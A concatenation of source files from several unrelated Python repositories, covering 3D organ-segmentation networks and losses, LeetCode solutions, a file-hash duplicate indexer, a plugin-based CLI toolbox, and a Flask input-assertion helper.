def __call__(self, data: Mapping[Hashable, np.ndarray]) -> Dict[Hashable, np.ndarray]:
super().randomize(None)
the_angle = self.R.uniform(low=-self.angle, high=self.angle)
d = dict(data)
if self._do_transform:
for i, key in enumerate(self.keys):
d[key] = rotate(data[key], angle=the_angle, axes=(0, 1), reshape=False, order=self.interp_order[i]) # functionality
return d
class ToTensor(Transform):
"""
Dictionary-based ToTensor
"""
def __init__(self, keys: Sequence[str]) -> None:
self.keys = keys
def __call__(self, data: Mapping[Hashable, Union[np.ndarray, torch.Tensor]]) -> torch.Tensor:
d = dict(data)
for key in self.keys:
if isinstance(data[key], torch.Tensor):
d[key] = data[key].continguous()
d[key] = torch.as_tensor(np.ascontiguousarray(data[key][None])) # functionality: add a channel dimension to the input image before ToTensor
return d
```
#### File: models/unet_nine_layers/unet_l9_deep_sup_full_scheme.py
```python
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchsummary import summary
from models.unet import Encoder, Decoder, DoubleConv
from models.unet_nine_layers.unet_l9_deep_sup import DeepSup
from models.unet_nine_layers.unet_l9_deep_sup_edge import EGModule
from models.unet_nine_layers.unet_l9_deep_sup_edge_skip import edge_fusion
from models.unet_nine_layers.unet_l9_deep_sup_rfp import RFP_UAGs
class UNetL9DeepSupFullScheme(nn.Module):
def __init__(self, in_ch, out_ch, num_neigh='four', interpolate=True, init_ch=16, conv_layer_order='cbr'):
super(UNetL9DeepSupFullScheme, self).__init__()
self.no_class = out_ch
## Encoder
self.encoders = nn.ModuleList([
Encoder(in_ch, init_ch, is_max_pool=False, conv_layer_order=conv_layer_order),
Encoder(init_ch, 2 * init_ch, conv_layer_order=conv_layer_order),
Encoder(2 * init_ch, 4 * init_ch, conv_layer_order=conv_layer_order),
Encoder(4 * init_ch, 8 * init_ch, conv_layer_order=conv_layer_order),
Encoder(8 * init_ch, 16 * init_ch, conv_layer_order=conv_layer_order)
])
## Decoder
self.decoders = nn.ModuleList([
Decoder(8*init_ch+16*init_ch+32, 8*init_ch, interpolate, conv_layer_order=conv_layer_order),
Decoder(4*init_ch+8*init_ch+32, 4*init_ch, interpolate, conv_layer_order=conv_layer_order),
Decoder(2*init_ch+4*init_ch+32, 2*init_ch, interpolate, conv_layer_order=conv_layer_order),
Decoder(init_ch+2*init_ch+32, init_ch, interpolate, conv_layer_order=conv_layer_order)
])
# deep supervision
self.deep_sup4 = DeepSup(8 * init_ch, out_ch=self.no_class, scale_factor=8)
self.deep_sup3 = DeepSup(4 * init_ch, out_ch=self.no_class, scale_factor=4)
self.deep_sup2 = DeepSup(2 * init_ch, out_ch=self.no_class, scale_factor=2)
self.deep_sup1 = nn.Conv3d(init_ch, self.no_class, kernel_size=1)
## Edge detection
self.edge_module = EGModule(init_ch)
self.final_conv = nn.Sequential(nn.Dropout3d(0.1, False),
nn.Conv3d(self.no_class * 4, self.no_class, 1))
## RFP-Head
trans_ch = 16 * init_ch // 2
self.adapt = nn.Sequential(
nn.Conv3d(16*init_ch, trans_ch, 3, padding=1, bias=False),
nn.BatchNorm3d(trans_ch),
nn.ReLU(),
)
self.rfp = RFP_UAGs(in_ch=trans_ch, num_neigh=num_neigh)
self.rfp_fnl_conv = nn.Sequential(
nn.Conv3d(trans_ch, trans_ch, 3, padding=1, bias=False),
nn.BatchNorm3d(trans_ch),
nn.ReLU(),
nn.Conv3d(trans_ch, self.no_class, 1)
)
# Out conv
self.comb_fnl_conv = nn.Conv3d(self.no_class * 2, self.no_class, 1)
def forward(self, x):
encoders_features = []
enc1 = self.encoders[0](x)
enc2 = self.encoders[1](enc1)
enc3 = self.encoders[2](enc2)
enc4 = self.encoders[3](enc3)
mid = self.encoders[4](enc4)
encoders_features = [enc4, enc3, enc2, enc1]
# Edge detection
edge_feat, edge_score = self.edge_module(enc2, mid)
# Edge skip-connections
skip4 = edge_fusion(enc4, edge_feat)
skip3 = edge_fusion(enc3, edge_feat)
skip2 = edge_fusion(enc2, edge_feat)
skip1 = edge_fusion(enc1, edge_feat)
dec4 = self.decoders[0](skip4, mid)
dec3 = self.decoders[1](skip3, dec4)
dec2 = self.decoders[2](skip2, dec3)
dec1 = self.decoders[3](skip1, dec2)
dsup4 = self.deep_sup4(dec4)
dsup3 = self.deep_sup3(dec3)
dsup2 = self.deep_sup2(dec2)
dsup1 = self.deep_sup1(dec1)
seg_score = self.final_conv(torch.cat((dsup4, dsup3, dsup2, dsup1), dim=1))
# RFP-Head
mid_adapt = self.adapt(mid)
ehn_mid = self.rfp(mid_adapt)
rfp_seg_score = self.rfp_fnl_conv(ehn_mid)
rfp_seg_score = F.upsample(rfp_seg_score, scale_factor=16, mode='trilinear', align_corners=True)
comb_seg_score = self.comb_fnl_conv(torch.cat((seg_score, rfp_seg_score), 1))
return seg_score, comb_seg_score, edge_score
if __name__ == '__main__':
import time
import os
from torchsummary import summary
os.environ['CUDA_VISIBLE_DEVICES'] = '1'
model = UNetL9DeepSupFullScheme(1, 9, num_neigh='eight', init_ch=16, conv_layer_order='cbr', interpolate=True)
device = torch.device('cuda')
model = model.to(device)
data = torch.randn((1, 1, 160, 160, 64)).cuda()
tic = time.time()
x = model(data)
toc = time.time()
print('Inference Time {:.4f}'.format(toc-tic))
# four neighbor: 0.9381 s
# eight neighbor: 2.3929 s
# summary(model, (1, 160, 160, 64))
# from models.unet_nine_layers.unet_l9 import count_parameters
# print('Total number of trainable parameters: {:.2f} M'.format(count_parameters(model) / 1e6))
```
#### File: jeff7021/organseg_dags/utils.py
```python
import os
import random
import json
import numpy as np
import nibabel as nib
import SimpleITK as sitk
import torch
import torch.nn as nn
import torch.nn.functional as F
from sklearn.model_selection import KFold
from metrics import dice
criterion_ce = torch.nn.CrossEntropyLoss() # combine softmax and CE
def get_num(path):
"""labelxxxx.nii.gz"""
return os.path.basename(path).split('.')[0][-4:]
def tup_to_dict(file_list):
out_list = []
for tup in file_list:
dct = {}
dct['img_file'] = tup[0]
dct['image'] = tup[0]
dct['label'] = tup[1]
dct['edge'] = tup[2]
out_list.append(dct)
return out_list
def mfb_ce(input, target):
"""
median frequency balancing weighted cross-entropy loss
:param input: B * C * H * W * D
:param target: B * H * W * D
:return:
"""
# self.class_mapping = {
# "1": "spleen", #
# "2": 'left kidney', # 3 -> 2
# "3": 'gallbladder', # 4 -> 3
# "4": 'esophagus', # 5 -> 4
# "5": 'liver', # 6 -> 5
# "6": 'stomach', # 7 -> 6
# "7": 'pancreas', # 11 -> 7
# "8": 'duodenum', # 14 -> 8
# }
mfb_weights = torch.Tensor([0.01296055, 0.6061528, 1., 6.39558407, 10.95443216,
0.09695645, 0.41963412, 2.04366128, 1.85810754]).cuda()
# softmax + ce
return F.cross_entropy(input, target, mfb_weights, reduction='mean')
def bce2d_new(input, target, reduction='mean'):
"""EGNet ICCV 2019"""
assert(input.size() == target.size())
# for every positions, return 1 if same
pos = torch.eq(target, 1).float()
neg = torch.eq(target, 0).float()
# ing = ((torch.gt(target, 0) & torch.lt(target, 1))).float()
num_pos = torch.sum(pos)
num_neg = torch.sum(neg)
num_total = num_pos + num_neg
alpha = num_neg / num_total
beta = 1.1 * num_pos / num_total
# target pixel = 1 -> weight beta
# target pixel = 0 -> weight 1-beta
weights = alpha * pos + beta * neg
# sigmoid + ce
return F.binary_cross_entropy_with_logits(input, target, weights, reduction=reduction)
class AvgMeter(object):
"""
Acc meter class, use the update to add the current acc
and self.avg to get the avg acc
"""
def __init__(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def poly_lr(epoch, max_epochs, initial_lr, exponent=0.9):
return initial_lr * (1 - epoch / max_epochs)**exponent
def expand_as_one_hot(input, C, ignore_index=None):
"""
Converts NxDxHxW label image to NxCxDxHxW, where each label gets converted to its corresponding one-hot vector
:param input: 4D input image (NxDxHxW)
:param C: number of channels/labels
:param ignore_index: ignore index to be kept during the expansion
:return: 5D output image (NxCxDxHxW)
"""
assert input.dim() == 4
# expand the input tensor to Nx1xDxHxW before scattering
input = input.unsqueeze(1)
# create result tensor shape (NxCxDxHxW)
shape = list(input.size())
shape[1] = C
if ignore_index is not None:
# create ignore_index mask for the result
mask = input.expand(shape) == ignore_index
# clone the src tensor and zero out ignore_index in the input
input = input.clone()
input[input == ignore_index] = 0
# scatter to get the one-hot tensor
result = torch.zeros(shape).to(input.device).scatter_(1, input, 1)
# bring back the ignore_index in the result
result[mask] = ignore_index
return result
else:
# scatter to get the one-hot tensor
return torch.zeros(shape).to(input.device).scatter_(1, input, 1)
def compute_per_channel_dice(input, target, epsilon=1e-6, weight=None):
"""
Computes DiceCoefficient as defined in https://arxiv.org/abs/1606.04797 given a multi channel input and target.
Assumes the input is a normalized probability, e.g. a result of Sigmoid or Softmax function.
Args:
input (torch.Tensor): NxCxSpatial input tensor
target (torch.Tensor): NxCxSpatial target tensor
epsilon (float): prevents division by zero
weight (torch.Tensor): Cx1 tensor of weight per channel/class
"""
# input and target shapes must match
assert input.size() == target.size(), "'input' and 'target' must have the same shape"
# (N, C, D, H, W) -> (C, N * D * H * W)
input = flatten(input)
target = flatten(target)
target = target.float()
# compute per channel Dice Coefficient
intersect = (input * target).sum(-1)
if weight is not None:
intersect = weight * intersect
# here we can use standard dice (input + target).sum(-1) or extension (see V-Net) (input^2 + target^2).sum(-1)
denominator = (input * input).sum(-1) + (target * target).sum(-1)
return 2 * (intersect / denominator.clamp(min=epsilon))
def compute_dsc(predicted_map, target, no_class):
"""average DSC scores across subjects in a batch"""
# to one-hot
predicted_map = expand_as_one_hot(predicted_map.squeeze(1).long(), no_class).cpu().numpy()
target = expand_as_one_hot(target.squeeze(1).long(), no_class).cpu().numpy()
# DSC
organs_dsc = np.zeros((target.shape[0], target.shape[1]-1))
for b in range(target.shape[0]): # batch_size
for i in range(1, no_class):
tmp_dsc = dice(predicted_map[b, i, ...], target[b, i, ...], nan_for_nonexisting=False)
organs_dsc[b, i-1] = tmp_dsc
return np.average(organs_dsc, axis=0)
def flatten(tensor):
"""Flattens a given tensor such that the channel axis is first.
The shapes are transformed as follows:
(N, C, D, H, W) -> (C, N * D * H * W)
"""
# number of channels
C = tensor.size(1)
# new axis order
axis_order = (1, 0) + tuple(range(2, tensor.dim()))
# Transpose: (N, C, D, H, W) -> (C, N, D, H, W)
transposed = tensor.permute(axis_order)
# Flatten: (C, N, D, H, W) -> (C, N * D * H * W)
return transposed.contiguous().view(C, -1)
def get_files_from_txt(txt_files):
"""
:return: [(img_file, lab_file), ...]
"""
with open(txt_files, 'r') as f:
this_files = f.readlines()
files = [(i.rstrip('\n').split(',')[0], i.rstrip('\n').split(',')[1]) for i in this_files]
return files
def do_split(txt_file):
"""save cv fold json"""
files = get_files_from_txt(txt_file)
kf = KFold(n_splits=4, random_state=123, shuffle=True)
train, val = {}, {}
for i, (train_index, val_index) in enumerate(kf.split(files)):
tmp_tr = [files[idx] for idx in train_index]
tmp_val = [files[idx] for idx in val_index]
train[f'fold_{i}'] = tmp_tr
val[f'fold_{i}'] = tmp_val
obj = {'train': train, 'val': val}
with open(txt_file.replace('all_high_resolution.txt', 'cv_high_resolution.json'), 'w') as f:
json.dump(obj, f, indent=4)
def get_fold_from_json(json_file, fold):
"""read json to get training and validation files list"""
with open(json_file, 'r') as f:
a = json.load(f)
return a['train'][f'fold_{fold}'], a['val'][f'fold_{fold}']
def save_volume(case, vol, out_fd):
"""
:param case: files path
:param vol: (np.ndarray) H * W * D
:return:
"""
os.makedirs(out_fd, exist_ok=True)
out_name = '_'.join([case.split('/')[-3], case.split('/')[-1]])
out_name = out_name.replace('img', 'pseg')
affine = nib.load(case).affine
nib_vol = nib.Nifti1Image(vol.astype(np.int32), affine)
nib.save(nib_vol, os.path.join(out_fd, out_name))
def save_edge(case, edge, out_fd):
"""
:param case:
:param edge: (np.ndarray)
:param out_fd:
:return:
"""
os.makedirs(out_fd, exist_ok=True)
out_name = '_'.join([case.split('/')[-3], case.split('/')[-1]])
out_name = out_name.replace('img', 'edge')
out_name_np = out_name.replace('.nii.gz', '.npz')
affine = nib.load(case).affine
edge_lt = (edge * 255.).astype(np.int32)
nib_vol = nib.Nifti1Image(edge_lt, affine)
nib.save(nib_vol, os.path.join(out_fd, out_name))
# np.save(os.path.join(out_fd, out_name_np), edge)
if __name__ == '__main__':
do_split('/data/yzf/dataset/Project/ranet-dataset/all_high_resolution.txt')
```
|
{
"source": "jeff-901/leetcode",
"score": 3
}
|
#### File: leetcode/2073/sol.py
```python
class Solution(object):
def timeRequiredToBuy(self, tickets, k):
"""
:type tickets: List[int]
:type k: int
:rtype: int
"""
ans = 0
require = tickets[k]
for i, ele in enumerate(tickets):
if i == k:
ans += require
elif i < k:
ans += min(tickets[i], require)
else:
ans += min(tickets[i], require - 1)
return ans
```
#### File: leetcode/2076/sol.py
```python
class Solution(object):
def friendRequests(self, n, restrictions, requests):
"""
:type n: int
:type restrictions: List[List[int]]
:type requests: List[List[int]]
:rtype: List[bool]
"""
parents = [_ for _ in range(n)]
restrict = [set() for _ in range(n)]
ans = []
def find(node):
if parents[node] != node:
parents[node] = find(parents[node])
return parents[node]
for a, b in restrictions:
restrict[a].add(b)
restrict[b].add(a)
for a, b in requests:
ap = find(a)
bp = find(b)
flag = True
for ele in restrict[ap]:
if find(ele) == bp:
ans.append(False)
flag = False
break
if flag:
for ele in restrict[bp]:
if find(ele) == ap:
ans.append(False)
flag = False
break
if flag:
if ap != bp:
parents[ap] = bp
for ele in restrict[ap]:
restrict[bp].add(ele)
ans.append(True)
return ans
```
|
{
"source": "jeff-99/hashdex",
"score": 3
}
|
#### File: hashdex/hashdex/files.py
```python
import os
from collections import namedtuple
File = namedtuple('File', ['full_path', 'filename'])
class DirectoryScanner(object):
def __init__(self, basepath):
self.basepath = basepath
def _fetch_files(self, dir):
file_list = []
for root, subdirs, files in os.walk(dir):
for file in files:
file_list.append(File(os.path.join(root, file), file))
return file_list
def get_files(self):
if os.path.isfile(self.basepath):
real_path = os.path.realpath(os.path.expanduser(self.basepath))
return [File(real_path, os.path.basename(real_path))]
return self._fetch_files(self.basepath)
class DuplicateFileResult(object):
def __init__(self):
self.dupes = []
self.diffs = []
def add_duplicate(self, filepath):
self.dupes.append(filepath)
def get_files(self):
return self.dupes + self.diffs
def add_diff(self, filepath):
self.diffs.append(filepath)
def is_equal(self):
return len(self.dupes) > 0 and len(self.diffs) == 0
def __eq__(self, other):
return set(self.dupes) == set(other.dupes) and \
set(self.diffs) == set(other.diffs)
```
#### File: hashdex/hashdex/indexer.py
```python
import math
import os
import sqlite3
import filecmp
from hashlib import sha1, md5
from hashdex.files import DuplicateFileResult
from .files import File
def create_connection(db):
if db == ':memory:':
connection_string = db
else:
connection_string = os.path.expanduser(db)
dirname = os.path.dirname(connection_string)
if not os.path.exists(dirname):
os.makedirs(dirname)
return sqlite3.connect(connection_string)
class Hasher(object):
BYTE_COUNT = int(10e5) # 1MB
def get_hashes(self, file):
filesize = os.stat(file.full_path).st_size
with open(file.full_path, 'rb') as f:
content = b""
if filesize < self.BYTE_COUNT:
content += f.read(filesize)
else:
part_count = int(math.floor(self.BYTE_COUNT / 2))
content += f.read(part_count)
f.seek(part_count, os.SEEK_END)
content += f.read(part_count)
sha_hash = sha1(content).hexdigest()
md5_hash = md5(content).hexdigest()
return (sha_hash, md5_hash)
class Indexer(object):
def __init__(self, connection, hasher):
self.connection = connection
self.hasher = hasher
def build_db(self, ):
self.connection.execute("""
CREATE TABLE hashes (
hash_id INTEGER PRIMARY KEY AUTOINCREMENT,
sha1_hash TEXT,
md5_hash TEXT
)
""")
self.connection.execute("CREATE UNIQUE INDEX idx_hashes ON hashes ( sha1_hash , md5_hash )")
self.connection.execute("""
CREATE TABLE files (
hash_id INTEGER,
full_path TEXT,
filename TEXT,
FOREIGN KEY(hash_id) REFERENCES hashes(hash_id)
)
""")
self.connection.execute("CREATE UNIQUE INDEX idx_paths ON files ( full_path )")
def _check_index(self, sha1_hash, md5_hash):
return self.connection.execute("SELECT hash_id FROM hashes WHERE sha1_hash = ? AND md5_hash = ? ",
[sha1_hash, md5_hash]).fetchone()
def add_file(self, file):
sha_hash, md5_hash = self.hasher.get_hashes(file)
cursor = self.connection.cursor()
try:
cursor.execute("INSERT OR IGNORE INTO hashes (sha1_hash, md5_hash) VALUES (?,?)", (sha_hash, md5_hash))
hash_id = self._check_index(sha_hash, md5_hash)[0]
cursor.execute(
"INSERT OR IGNORE INTO files (hash_id, full_path, filename) VALUES (?,?,?)",
(hash_id, file.full_path, file.filename)
)
self.connection.commit()
except sqlite3.Error as e:
print(e)
self.connection.rollback()
def in_index(self, file):
sha_hash, md5_hash = self.hasher.get_hashes(file)
return self._check_index(sha_hash, md5_hash) is not None
def fetch_indexed_file(self, file):
sha_hash, md5_hash = self.hasher.get_hashes(file)
data = self.connection.cursor().execute("""
SELECT full_path, filename
FROM files f
JOIN hashes h ON h.hash_id = f.hash_id
WHERE h.sha1_hash = ? AND h.md5_hash = ?
""", (sha_hash, md5_hash)).fetchone()
if data is None:
return None
return File(data[0], data[1])
def get_index_count(self):
return self.connection.cursor().execute("SELECT COUNT(*) FROM hashes").fetchone()[0]
def get_duplicates(self):
cursor = self.connection.cursor()
dupes = cursor.execute("""
SELECT GROUP_CONCAT(full_path , '|') FROM files f
JOIN hashes h ON h.hash_id = f.hash_id
GROUP BY h.hash_id
HAVING COUNT(h.hash_id) > 1
""").fetchall()
for (dupe,) in dupes:
real_dupes = dupe.split("|")
result = DuplicateFileResult()
first = real_dupes[0]
result.add_duplicate(first)
for next in real_dupes[1:]:
same = filecmp.cmp(first, next)
if not same:
result.add_diff(next)
else:
result.add_duplicate(next)
yield result
def get_files(self):
cursor = self.connection.cursor()
cursor = cursor.execute("SELECT full_path, filename FROM files")
while True:
results = cursor.fetchmany(1000)
if results is None:
break
for result in results:
yield File(result[0], result[1])
def delete(self, file):
cursor = self.connection.cursor()
try:
cursor.execute("DELETE FROM files WHERE full_path = ?", (file.full_path, ))
cursor.execute("""
DELETE FROM hashes WHERE hash_id IN (
SELECT hash_id
FROM hashes h
LEFT JOIN files f ON h.hash_id = f.hash_id
WHERE f.full_path IS NONE
)
""")
return True
except sqlite3.Error:
return False
```
|
{
"source": "jeff-99/toolbox",
"score": 2
}
|
#### File: toolbox/tests/plugin_module.py
```python
__author__ = 'jeff'
import toolbox.plugin
class TestPlugin(toolbox.plugin.ToolboxPlugin):
name = 'test'
description = 'test'
def prepare_parser(self, parser):
pass
def execute(self, args):
pass
```
#### File: toolbox/tests/test_scanner.py
```python
import unittest
from toolbox.scanner import find_modules, find_contrib_modules, find_local_modules
import os
CONTRIB_MODULES = sorted(['checksum', 'config', 'create', 'install', 'list', 'logs'])
CONTRIB_MODULES_IMPORT = ["toolbox.contrib.{}".format(i) for i in CONTRIB_MODULES]
class TestScanner(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_find_contrib_modules(self):
modules = find_contrib_modules()
self.assertEqual(sorted(modules), CONTRIB_MODULES_IMPORT)
def test_find_local_modules(self):
import toolbox.contrib
module_dir = os.path.dirname(toolbox.contrib.__file__)
modules = find_local_modules(module_dir)
self.assertEqual(sorted(modules), CONTRIB_MODULES)
```
#### File: toolbox/toolbox/cli.py
```python
import sys
from toolbox.core import Toolbox
def main():
toolbox = Toolbox()
toolbox(sys.argv[1:])
if __name__ == '__main__':
main()
```
#### File: contrib/create/parser.py
```python
__author__ = 'jeff'
import os
import re
from .renderer import ALIASES
class Parser(object):
def __init__(self, template_dir, dest_dir, args):
self.template_dir = template_dir
self.dest_dir = dest_dir
self.args = args
def resolve_key(self, match):
"""
Resolve the matched key and process it's value based on the supplied renderer
:param match:
:return:
:rtype: str
"""
args = match.group(1).split('|')
key = args[0]
processor_funcs = args[1:]
value = self.args.get(key, '')
for func_name in processor_funcs:
# get renderer func or use to string func
value = ALIASES.get(func_name, str)(value)
return value
def _parse_line(self, line):
"""
finds variable names from the provided line and calls the resolve_key method with eventual matches
It replaces the match with the resolved value and returns the line
:param line:
:return:
"""
pattern = r'{{(.*?)}}'
line = re.sub(pattern, self.resolve_key, line)
return line
def _parse_path(self, path):
return self._parse_line(path)
def _parse_file(self, fp):
new_data = []
with open(fp, 'r') as f:
data = f.readlines()
for line in data:
new_data.append(self._parse_line(line))
return "".join(new_data)
def parse(self):
"""
Walk the template dir, read the template files and parse them replacing variables in the files with values
given in the context dictionary.
Return a list of directories and files with their parsed content basically the output of os.walk.
:return:
"""
dir_content = []
for cur_path, dirs, files in os.walk(self.template_dir):
new_path = cur_path.replace(self.template_dir, self.dest_dir)
path = self._parse_path(new_path)
file_paths = [self._parse_path(fp) for fp in files]
file_contents = [self._parse_file(os.path.join(cur_path, fp))
for fp in files]
dir_content.append((path, file_paths, file_contents))
return dir_content
```
#### File: contrib/create/renderer.py
```python
import os
def capitalize(string):
return string.capitalize()
def pylist(param):
"""
Takes a comma separated string or list and renders a python list source code
:param param:
:return:
"""
prefix = '["'
suffix = '"]'
if isinstance(param, str):
param = param.split(' ')
if isinstance(param, list):
param = '","'.join(param)
return prefix + param + suffix
def path(string):
return os.path.abspath(string)
ALIASES = {'c': capitalize, 'path': path, 'pylist': pylist}
```
#### File: contrib/list/list.py
```python
__author__ = 'jeff'
from toolbox.plugin import ToolboxPlugin
from toolbox.mixins import RegistryMixin
from toolbox.scanner import find_modules
from terminaltables import AsciiTable
class ListPlugin(RegistryMixin, ToolboxPlugin):
name = 'list'
description = 'List all plugins'
def prepare_parser(self, parser):
parser.add_argument('-e',
'--external',
action='store_true',
help='only external plugins')
parser.add_argument('search', nargs="?", help="search query")
def execute(self, args):
registry = self.get_registry()
data = []
if args.external:
for name in find_modules():
if args.search is None or (args.search is not None and
self.search_match(args.search,
name)):
data.append([name, ''])
else:
for plugin in registry.get_plugins():
if args.search is None or (
args.search is not None and self.search_match(
args.search, plugin.name + plugin.description)):
data.append([plugin.name, plugin.description])
self.display_plugins(data)
def search_match(self, query, string):
return query in string
def display_plugins(self, data):
data.sort(key=lambda row: row[0])
data.insert(0, ['Plugin', 'Description'])
table = AsciiTable(data)
table.padding_left = 3
table.padding_right = 3
print(table.table)
```
#### File: contrib/logs/logs.py
```python
from toolbox.plugin import ToolboxPlugin
from toolbox.defaults import TOOLBOX_DIR
import os, re
class LogsPlugin(ToolboxPlugin):
name = 'logs'
description = 'view logs'
def prepare_parser(self, parser):
parser.add_argument('pluginlog', nargs="?", help="filter for plugin")
def execute(self, args):
with open(os.path.join(TOOLBOX_DIR, 'toolbox.log'), 'r') as f:
for line in f.readlines():
if args.pluginlog is not None:
pattern = 'toolbox.plugins.{}'.format(args.pluginlog)
match = re.search(re.escape(pattern), line, re.IGNORECASE)
if not match is None:
print(line.rstrip('\n'))
else:
print(line.rstrip('\n'))
```
#### File: toolbox/toolbox/core.py
```python
import argparse, logging, os
from logging.handlers import TimedRotatingFileHandler
from logging import Formatter
from .defaults import TOOLBOX_DIR
from .registry import Registry, NoPluginException
from .scanner import find_contrib_modules, find_modules, find_local_modules
class UnknownPlugin(Exception):
pass
class Toolbox(object):
"""
Initialize the toolbox, sets up the main argument parser and Tool registry
Core tools in de contrib package are always loaded
The local and external flags can be used to limit the loaded modules
:param bool external:
:param bool local:
:return:
"""
def __init__(self, external=True, local=True):
# load core plugins
modules = find_contrib_modules()
self.registry = Registry()
self.registry.populate(modules)
self.parser = argparse.ArgumentParser()
global_config = self.registry.get_plugin('config')
if len(global_config.get_config()) == 0:
global_config.set_defaults()
self._init_logger(debug=global_config.get('debug'))
extra_modules = []
if external:
extra_modules += find_modules(global_config.get('toolbox_prefix'))
extra_modules += global_config.get('external_plugins') or []
if local:
extra_modules += find_local_modules(global_config.get(
'local_plugin_dir'))
try:
self.registry.populate(extra_modules)
except (AttributeError, NoPluginException) as e:
print(
"An external Plugin caused trouble, please uninstall it -- {}".format(
e))
def _init_logger(self, debug):
"""
Initialise the main logger
:param debug:
:return:
"""
logger = logging.getLogger('toolbox')
handler = TimedRotatingFileHandler(
os.path.join(TOOLBOX_DIR, 'toolbox.log'), when='H', interval=1, encoding='utf-8', backupCount=1)
formatter = Formatter(
fmt="%(asctime)s %(name)-12s %(levelname)-8s %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.WARNING)
if debug is True:
logger.setLevel(logging.DEBUG)
def prepare(self):
"""
Prepares the main Argument parser by loading all registered plugins and setting their executable
:return:
"""
# prepare main parser
self.parser.usage = '%(prog)s tool [args]'
self.parser.description = 'Extendable plugin toolbox'
self.parser.add_argument('-v',
'--version',
help="Toolbox version",
action='store_true')
# prepare subparsers
subparsers = self.parser.add_subparsers(help='Plugins', dest='plugin')
for plugin in self.registry.get_plugins():
# create a new subparser for this plugin
plugin_parser = subparsers.add_parser(plugin.name)
# set the default execute method as plugin executable
plugin_parser.set_defaults(executable=plugin.execute)
# let the plugin prepare the arguments
plugin.prepare_parser(plugin_parser)
def execute(self, args):
"""
This is the Toolbox's main function which parses the arguments, which should yield:
- a Tool
- an Executable
- and some optional arguments
The Tool gets fetched from the registry where it will be fully loaded
and the exectuble is executed with the remaining args
:param args: List of arguments
:type args: list
:return:
"""
parsed_args = self.parser.parse_args(args)
if parsed_args.version:
import toolbox
print(toolbox.__version__)
exit()
if parsed_args.plugin is None:
self.parser.print_help()
raise UnknownPlugin('Plugin not set')
else:
# triggers the lazy loading of the selected plugin
self.registry.get_plugin(parsed_args.plugin)
try:
parsed_args.executable(parsed_args)
except Exception as e:
print("Somehow the plugin did not do what it should have done!")
print(e)
def shutdown(self):
"""
Shuts down the application, save and close config files etc.
:return:
"""
self.registry.shutdown()
def __call__(self, args):
"""
Run the Toolbox with the supplied arguments.
This method is primarily used by the commandline script
:param args:
:return:
"""
self.prepare()
try:
self.execute(args)
except UnknownPlugin:
return
self.shutdown()
```
|
{
"source": "Jeffacy99/Blog",
"score": 3
}
|
#### File: Blog/App/assertion.py
```python
import re
from functools import wraps
from flask import abort as flask_abort
from flask import request
from flask_maple.response import HTTP
def assert_request(assertion, include=[], exclude=[]):
def _assert_request(func):
@wraps(func)
def decorator(*args, **kwargs):
data = request.data
resp = assertion(data, include, exclude)()
if resp is not None:
return resp
return func(*args, **kwargs)
return decorator
return _assert_request
class Assert(object):
def __init__(self, data=dict(), include=[], exclude=[], abort=None):
self.data = data
self.asserts = {
i.split("_", 2)[1]: [i]
for i in dir(self) if i.startswith('assert_')
}
self._include = include
self._exclude = exclude
self._abort = abort
def abort(self, key, value, message):
if self._abort is not None:
if callable(self._abort):
return self._abort(key, value, message)
return self._abort
if not message:
message = "{0} params error".format(key)
return flask_abort(HTTP.BAD_REQUEST(message=message))
def add(self, key, assertion, *args, **kwargs):
# assertion.add("username", "assertRequire")
# assertion.add("password", "assertRequire", "密码不能为空")
# assertion.add("password", "assertLength", 5, 20)
assert hasattr(self, assertion)
def _assert(value):
assert getattr(self, assertion)(value, *args, **kwargs)
self.asserts.setdefault(key, [])
self.asserts[key].append(_assert)
def assertOr(self, funcs=[], msg=None):
raise_errors = []
for func in funcs:
try:
func()
except AssertionError as e:
raise_errors.append(e)
if funcs and len(raise_errors) == len(funcs):
if msg is None:
raise raise_errors[0]
raise AssertionError(msg) from raise_errors[0]
def assertAnd(self, funcs=[], msg=None):
for func in funcs:
try:
func()
except AssertionError as e:
if msg is None:
raise
raise AssertionError(msg) from e
def assertRequire(self, key, msg=None):
if not msg:
msg = "{0} is null".format(key)
if not bool(key):
raise AssertionError(msg)
def assertIn(self, key, value, msg=None):
if not msg:
msg = "{0} not in {1}".format(key, value)
if key not in value:
raise AssertionError(msg)
def assertType(self, key, value, msg=None):
if not msg:
msg = "{0}'s type is not {1}".format(key, value)
if not isinstance(key, value):
raise AssertionError(msg)
def assertEqual(self, key, value, ignore_case=False, msg=None):
if ignore_case:
key, value = key.lower(), value.lower()
if not msg:
msg = "{0} should be equal to {1}".format(key, value)
if key == value:
raise AssertionError(msg)
def assertLength(self, key, min_length=0, max_length=0, msg=None):
if not msg and min_length == max_length:
msg = "{0}'s length should be equal to {1}".format(key, min_length)
elif not msg and min_length == 0:
msg = "{0}'s length should be less than {1}".format(
key, max_length)
elif not msg and max_length == 0:
msg = "{0}'s length should be greater than {1}".format(
key, min_length)
elif not msg:
msg = "{0}'s length should be between with {1} to {2}".format(
key, min_length, max_length)
if key is None:
key = ""
length = len(key)
if length < min_length or (max_length > 0 and length > max_length):
raise AssertionError(msg)
def assertURL(self, value, msg=None):
if not msg:
msg = "{0} is not effective url".format(value)
key = r'^[a-z]+://(?P<host>[^/:]+)(?P<port>:[0-9]+)?(?P<path>\/.*)?$'
self.assertRegex(value, key, msg)
def assertEmail(self, value, msg=None):
if not msg:
msg = "{0} is not effective email".format(value)
key = r'^\<KEY>'
self.assertRegex(value, key, msg)
def assertRegex(self, key, value, msg=None):
if not msg:
msg = "{0} can't match with {1}".format(value, key)
if not re.match(value, key):
raise AssertionError(msg)
def __call__(self):
for key, funcs in self.asserts.items():
if self._include and key not in self._include:
continue
if self._exclude and key in self._exclude:
continue
value = self.data.get(key)
for func in funcs:
if isinstance(func, str):
func = getattr(self, func)
try:
func(value)
except AssertionError as e:
return self.abort(key, value, e)
# if __name__ == '__main__':
# class UserAssert(Assert):
# def assert_username(self, value):
# self.assertRequire(value, "用户名不能为空")
# self.assertLength(value, 4, 20, "用户名长度必须大于等于5")
# def assert_password(self, value):
# self.assertRequire(value, "密码不能为空")
# self.assertLength(value, 5, 20, "密码长度必须大于等于5")
# funcs = [
# lambda: self.assertRequire(value, "密码不能为空"),
